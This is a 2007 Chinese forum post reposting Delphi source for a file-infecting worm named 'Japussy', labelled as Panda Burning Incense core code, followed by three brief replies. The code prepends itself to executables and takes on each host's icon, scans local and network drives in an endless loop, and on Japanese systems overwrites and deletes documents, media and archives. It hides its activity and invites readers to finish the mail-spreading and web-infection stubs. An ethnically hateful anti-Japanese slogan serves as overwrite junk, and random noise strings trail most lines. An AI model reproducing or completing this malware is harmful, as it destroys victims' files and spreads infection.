

熊猫烧香核心源码(转)

真心浪子 发表于 2007-1-30 20:58 | 显示全部楼层 |阅读模式
program Japussy; >DxHavqJ
uses !pdOTf9
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry}; q#zdj R(
const + _FWL
HeaderSize = 82432;         //病毒体的大小 NbY{6cv
IconOffset = $12EB8;       //PE文件主图标的偏移量 8w*n D
LH*6SF T$k
//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同 7R){P*9o
//查找2800000020的十六进制字符串可以找到主图标的偏移量 5gy(DHy
zjZg lO~q,
{ \'e9T:uo.b
HeaderSize = 38912;         //Upx压缩过病毒体的大小 bW_`:
IconOffset = $92BC;         //Upx压缩过PE文件主图标的偏移量 gkuxb$
aw;+onI
//Upx 1.24W 用法: upx -9 --8086 Japussy.exe B8UI4f
} cZ E95}RL
IconSize   = $2E8;         //PE文件主图标的大小--744字节 Fo92T3hp
IconTail   = IconOffset + IconSize; //PE文件主图标的尾部  (.f L
ID     = $44444444;       //感染标记 tU\\e^+S!
j>^dd{G!
//垃圾码,以备写入 !*M=C]S
Catchword = \'If a race need to be killed out, it must be Yamato. \' + wyML*/i~#
    \'If a country need to be destroyed, it must be Japan! \' + I yj &)
    \'*** W32.Japussy.Worm.A ***\'; qB+M-d7
{$R *.RES} C%8dL|~_0
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; |}2l U|+2
stdcall; external \'Kernel32.dll\'; //函数声明 $<[KR $A
var V\\H+ [
TmpFile: string; H?r |{. 
Si:   STARTUPINFO; ^J3^H/B=Q
Pi:   PROCESS_INFORMATION; N^j3n>!K
IsJap:   Boolean = False; //日文操作系统标记 3h7f F!
{ 判断是否为Win9x } j}[R&
function IsWin9x: Boolean; d10[p[n4j
var >V^hHb.S
Ver: TOSVersionInfo; xzTdxa0
begin Eq` !]_gJ
Result := False; M,Ka0W
Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo); _\"_u G^&
if not GetVersionEx(Ver) then y /t{zV\\zx
Exit; }p]=p f41
if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x <`4Y7z6 :
Result := True; Q\\ztl7I
end; `tyj.^uP
{ 在流之间复制 } 5HBO Y
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream; gw3KbCy
dStartPos: Integer; Count: Integer); GD ,0KtY
var uO+ryPM[$
sCurPos, dCurPos: Integer; ?<k=\'&!5b
begin BfO&,t#tN,
sCurPos := Src.Position; ix\\eOkA
dCurPos := Dst.Position; H!7e1tP\\2
Src.Seek(sStartPos, 0); )Fy *&
Dst.Seek(dStartPos, 0); :q(-*
Dst.CopyFrom(Src, Count); [=S,gN
Src.Seek(sCurPos, 0);  (/\\Ksx
Dst.Seek(dCurPos, 0); TllW4~A
end; M% Cgq
{ 将宿主文件从已感染的PE文件中分离出来,以备使用 } h}MKMk
procedure ExtractFile(FileName: string); {e>I1#s>u,
var -Cr>O|!,.
sStream, dStream: TFileStream; o#GM^q\\/`
begin gUAAndZ-x_
try vO/5V@jn
sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone); 2U;)qCa
try WZla,./
  dStream := TFileStream.Create(FileName, fmCreate); zcwF
  try O`x0 P2
  sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分 3Qx_51f^
  dStream.CopyFrom(sStream, sStream.Size - HeaderSize); twz&oJ%
  finally &C>DoY
  dStream.Free; r?nD$J
  end; $N=:=}
finally GA@< m`
  sStream.Free; `\' iB/
end; olX7?P0
except FaL5Op#
end; GX$\'CncLiE
end; .VF<+eB[m
{ 填充STARTUPINFO结构 } j+ X>f0v
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word); y%SrU%1{h
begin aM7P3U
Si.cb := SizeOf(Si); )~[L i#qm
Si.lpReserved := nil; AelkpJ
Si.lpDesktop := nil; Ly$ 4u7Tf
Si.lpTitle := nil; >=;C~?8S
Si.dwFlags := STARTF_USESHOWWINDOW; s{?gpZH
Si.wShowWindow := State; U#zrZ N&
Si.cbReserved2 := 0; NS$s{zR##
Si.lpReserved2 := nil; kzgR[.w(
end; o@B21x
{ 发带毒邮件 } hmh*] RR
procedure SendMail; J0$`Ysl
begin 0X\'JIJNK
//哪位仁兄愿意完成之? A+XuMms
end; kn. u/1
{ 感染PE文件 } bbpGFBS(
procedure InfectOneFile(FileName: string); D8~6, }2s
var yf n`Y wN
HdrStream, SrcStream: TFileStream; \\Bx}6Jb
IcoStream, DstStream: TMemoryStream; \"~05\"j
iID: LongInt; vUwRe->>G
aIcon: TIcon; LuEF
Infected, IsPE: Boolean; 9fV{|b^8
i: Integer; G{_qM3nD
Buf: array[0..1] of Char; 8u7& nr
begin Y[_/gBy@
try //出错则文件正在被使用,退出 z\\},s&
if CompareText(FileName, \'JAPUSSY.EXE\') = 0 then //是自己则不感染 w wzrUi
  Exit; GB5iP&N]W
Infected := False; (hYZniM
IsPE   := False; [ 3_N(/2h
SrcStream := TFileStream.Create(FileName, fmOpenRead); T(ef|{.
try X*t@[v\'#
  for i := 0 to $108 do //检查PE文件头 /|Y&/#ZErP
  begin }Q S U/|
  SrcStream.Seek(i, soFromBeginning); k@c9wD#%
  SrcStream.Read(Buf, 2); 2 K.tAl<,B
  if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记 psG(F2\"%
  begin uYb [02
    IsPE := True; //是PE文件 K{z nxxo
    Break; Mx2k5xO?
  end; $NC#cOs:
  end; QsrRc%WM
  SrcStream.Seek(-4, soFromEnd); //检查感染标记 4XWe2LxA\'
  SrcStream.Read(iID, 4); 7X<HA D
  if (iID = ID) or (SrcStream.Size < 10240) then //太小的文件不感染 P|~6G/=i
  Infected := True; M8o F@}/
finally {FV%%U
  SrcStream.Free; viOzG0 )L
end; OrS~LOj0zc
if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出 d-=\',p1xV.
  Exit; hsh\\\'3mg
IcoStream := TMemoryStream.Create; )%o,7j
DstStream := TMemoryStream.Create; gOB$kp
try \"IqR1OtS
  aIcon := TIcon.Create; 1 5YS8\\`
  try 8}\\.=<\\vP
  //得到被感染文件的主图标(744字节),存入流 $t3kM-
  aIcon.ReleaseHandle; XIs|D+uQg
  aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0); ! !.zZ@Hx
  aIcon.SaveToStream(IcoStream); ~:ute2y
  finally J`>2pcw
  aIcon.Free; pkKc2r l
  end; Xb_4 DJi
  SrcStream := TFileStream.Create(FileName, fmOpenRead); (rt-g;
  //头文件 6Wb8|4
  HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone); 9/9T8IpR$
  try N4@5 +HJ-
  //写入病毒体主图标之前的数据 [) JWSJ
  CopyStream(HdrStream, 0, DstStream, 0, IconOffset); YIN]_kV~/R
  //写入目前程序的主图标 h#cN_g^>
  CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize); i Tnt\\%
  //写入病毒体主图标到病毒体尾部之间的数据 e$6]Tz (
  CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail); ;w;:Vp_
  //写入宿主程序 |=_)C3~!
  CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size); 162`R[W
  //写入已感染的标记 5X; GfR?
  DstStream.Seek(0, 2); ]=b8g\'Ly)
  iID := $44444444; v w~s[(
  DstStream.Write(iID, 4); ]aJI
  finally pA\"u4
  HdrStream.Free;  xH2U
  end; (~~jD
finally y43<JwY
  SrcStream.Free; i#V5]o
  IcoStream.Free; +>l|`gw
  DstStream.SaveToFile(FileName); //替换宿主文件 3KagX=!O<
  DstStream.Free; /ZJ WBmyd
end;  k=3:![
except; `o|G.c
end; q$C >~
end; lV o
{ 将目标文件写入垃圾码后删除 } ,d:`VUDd3
procedure SmashFile(FileName: string); M,\'y n _
var IeJ=|R
FileHandle: Integer; qx*wNJe
i, Size, Mass, Max, Len: Integer; b8uD#>*`q
begin tZ*c*3J
try |j Zo(Lds
SetFileAttributes(PChar(FileName), 0); //去掉只读属性 7Calja +
FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件 hZyIU)gSw
try {<9He^I#
  Size := GetFileSize(FileHandle, nil); //文件大小 *jSu|(*7C
  i := 0; %jYT2A$
  Randomize; ~JNe0{ {!
  Max := Random(15); //写入垃圾码的随机次数 : I\'gZvGU
  if Max < 5 then {~PG{lS5
  Max := 5; Qq-m#Yu^$j
  Mass := Size div Max; //每个间隔块的大小 E|!XVzl
  Len := Length(Catchword); A%Lv60
  while i < Max do p v8C,3
  begin em4m\' \\
  FileSeek(FileHandle, i * Mass, 0); //定位 4y 4<z0v
  //写入垃圾码,将文件彻底破坏掉 Nw{V f!
  FileWrite(FileHandle, Catchword, Len); 0Jum{8p 2
  Inc(i); OKgL$dF\\
  end; abA!?- x
finally 1;8;H,/15%
  FileClose(FileHandle); //关闭文件 *R?sNmz
end; FIV{J.a}E
DeleteFile(PChar(FileName)); //删除之 LZuKbc
except  l+G&M%
end; Lz ]Z52ah
end; m=L3>;o$
{ 获得可写的驱动器列表 } G%S,R_]K
function GetDrives: string; \'Y7F$(SaG
var &x|\'5{!y>
DiskType: Word; @IE ex-
D: Char; !%GDlK%
Str: string; +a sTu><#Q
i: Integer; #!`.Xo?1
begin m2n$EO
for i := 0 to 25 do //遍历26个字母 voXL1r
begin W/CfIhnN
D := Chr(i + 65); \'M<$+HZL
Str := D + \':\\\'; d gi>TVj
DiskType := GetDriveType(PChar(Str)); !\\HG<B= q
//得到本地磁盘和网络盘 C,t+-Hnd
if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then j\"Q!a3:+q
  Result := Result + D; 2m%b*IIs
end; =sd FQo`A
end; 4)(.LbIs{&
{ 遍历目录,感染和摧毁文件 } ~.A4_OIq
procedure LoopFiles(Path, Mask: string); hf 82
var >+gi61$
i, Count: Integer; Y:gK;6#
Fn, Ext: string; =3$z\'w &<
SubDir: TStrings; T,?g IJ1
SearchRec: TSearchRec; l~!XdJ4
Msg: TMsg; .rj82yi
function IsValidDir(SearchRec: TSearchRec): Integer; P4 r\'#c
begin #0X, #u.
if (SearchRec.Attr <> 16) and (SearchRec.Name <> \'.\') and l%%9OC]\'
  (SearchRec.Name <> \'..\') then Xb+XB
  Result := 0 //不是目录 \'=7J!|y1}
else if (SearchRec.Attr = 16) and (SearchRec.Name <> \'.\') and 5AA./}5U
  (SearchRec.Name <> \'..\') then ara1@\"h1U
  Result := 1 //不是根目录 4#J gjzoI
else Result := 2; //是根目录 # d&s
end; `VjEd
begin E~;FC+Vf(
if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then Uu`@x?
begin OC K/`#w&
repeat wGJv&6O
  PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑 jssTItJu
  if IsValidDir(SearchRec) = 0 then T_k&[x
  begin ,0\\ GU;(y
  Fn := Path + SearchRec.Name; 9ENW[+F
  Ext := UpperCase(ExtractFileExt(Fn)); 9cc=z@l
  if (Ext = \'.EXE\') or (Ext = \'.SCR\') then )T?YiNL
  begin 4j>*J5\'-
    InfectOneFile(Fn); //感染可执行文件   }R{3~N$5V
  end *29YyU%
  else if (Ext = \'.HTM\') or (Ext = \'.HTML\') or (Ext = \'.ASP\') then ;[as^P
  begin GwapCRhjh
    //感染HTML和ASP文件,将Base64编码后的病毒写入 =]fYi6O
    //感染浏览此网页的所有用户 NHd5%: n
    //哪位大兄弟愿意完成之? %}=3;7
  end 50/5`AkL
  else if Ext = \'.WAB\' then //Outlook地址簿文件 w\' ;{pxf.
  begin W`;@ (M9
    //获取Outlook邮件地址 hU,DP i}
  end Mzn. >
  else if Ext = \'.ADC\' then //Foxmail地址自动完成文件 (7V>IsO66
  begin OpG#<|a
    //获取Foxmail邮件地址 X7J 6nuI
  end H`>&A=if:
  else if Ext = \'IND\' then //Foxmail地址簿文件 JL#KtwB0
  begin dRsoF7
    //获取Foxmail邮件地址 iL lJsGh^R
  end %Q#@RwA+
  else R}< S4,=E
  begin Q V,f-[9
    if IsJap then //是倭文操作系统 D[[ WBJS
    begin ]f -)4D.
    if (Ext = \'.DOC\') or (Ext = \'.XLS\') or (Ext = \'.MDB\') or  H?nqmV
    (Ext = \'.MP3\') or (Ext = \'.RM\') or (Ext = \'.RA\') or A bv&[V
    (Ext = \'.WMA\') or (Ext = \'.ZIP\') or (Ext = \'.RAR\') or puau$k
    (Ext = \'.MPEG\') or (Ext = \'.ASF\') or (Ext = \'.JPG\') or :Z ,9Y
    (Ext = \'.JPEG\') or (Ext = \'.GIF\') or (Ext = \'.SWF\') or .!?9 3Q
    (Ext = \'.PDF\') or (Ext = \'.CHM\') or (Ext = \'.AVI\') then : C`Av|f
      SmashFile(Fn); //摧毁文件 @&5[LiW
    end; 7.WA\\Rq%
  end; V4YuZR
  end; u~XE *Vb
  //感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑 jLXl boww_
  Sleep(200); Hb~\"ki![
until (FindNext(SearchRec) <> 0); m/p.OpoE
end; NxFM*
FindClose(SearchRec); ZtzdRJ
SubDir := TStringList.Create; iv<+2XZ3
if (FindFirst(Path + \'*.*\', faDirectory, SearchRec) = 0) then K?-0JkM}
begin #rybNpyV
repeat Y!%`vq; %
  if IsValidDir(SearchRec) = 1 then kZH.lkB$TH
  SubDir.Add(SearchRec.Name); #ewa _@9
until (FindNext(SearchRec) <> 0); n_L/c*dw
end; Cj%ZN +
FindClose(SearchRec);  1gj t9
Count := SubDir.Count - 1; vTDLeaP?
for i := 0 to Count do p:sQ\\R+}}
LoopFiles(Path + SubDir.Strings + \'\\\', Mask); jc,I{F.+
FreeAndNil(SubDir); Q\'Gy
end; sqP&1
{ 遍历磁盘上所有的文件 } OoRTm-X*FH
procedure InfectFiles; I ;xB Rm#
var ,$A&j6aE
DriverList: string; Goeo[^W_Z
i, Len: Integer; \"7neAx
begin ig?r2+_A
if GetACP = 932 then //日文操作系统 2*>euD j,S
IsJap := True; //DriverList := GetDrives; //得到可写的磁盘列表 `2 1HH\'
Len := Length(DriverList); {I(Na1y%2
while True do //死循环 /[u@fSt9s
begin dXGKqz1^
for i := Len downto 1 do //遍历每个磁盘驱动器 Df 8%\'
  LoopFiles(DriverList + \':\\\', \'*.*\'); //感染之 2b0 <RH]
SendMail; //发带毒邮件 ]N D9SD7f
Sleep(1000 * 60 * 5); //睡眠5分钟 #]B>M,\"@?
end; TXedc9P
end; )J, U qE
{ 主程序开始 } R3zEYK
begin b km%`/
if IsWin9x then //是Win9x M~2Z@*H
RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程 \')hlY`S7
else //WinNT 1G]-9(L>Q
begin \"Vb^qlv~$d
//远程线程映射到Explorer进程 ,3\\&<x{!S
//哪位兄台愿意完成之? +VA ~*tU
end; <^s.>Gt{}.
//如果是原始病毒体自己 a}zz~n
if CompareText(ExtractFileName(ParamStr(0)), \'Japussy.exe\') = 0 then E*WEh*
InfectFiles //感染和发邮件 a3iA*}1K
else //已寄生于宿主程序上了,开始工作 iS,\'v[\'>
begin sXE$s%P
TmpFile := ParamStr(0); //创建临时文件 #dbNGb7J 
Delete(TmpFile, Length(TmpFile) - 4, 4); UFrx^Os+k
TmpFile := TmpFile + #32 + \'.exe\'; //真正的宿主文件,多一个空格 N^x~`sO
ExtractFile(TmpFile); //分离之 j|# jgBA!
FillStartupInfo(Si, SW_SHOWDEFAULT);   6~\\(
CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True, g$\"D|8A
  0, nil, \'.\', Si, Pi); //创建新进程运行之  L
InfectFiles; //感染和发邮件 ` ;-n| kF
end; QAJW}P1
end.
joe 发表于 2007-1-31 00:23 | 显示全部楼层
很快又会有各种各样的变种......::12::
cayean 发表于 2007-1-31 15:43 | 显示全部楼层
对这个不懂!::11::
donphone 发表于 2007-2-1 19:46 | 显示全部楼层
看的好晕~ 官方发布的吧~?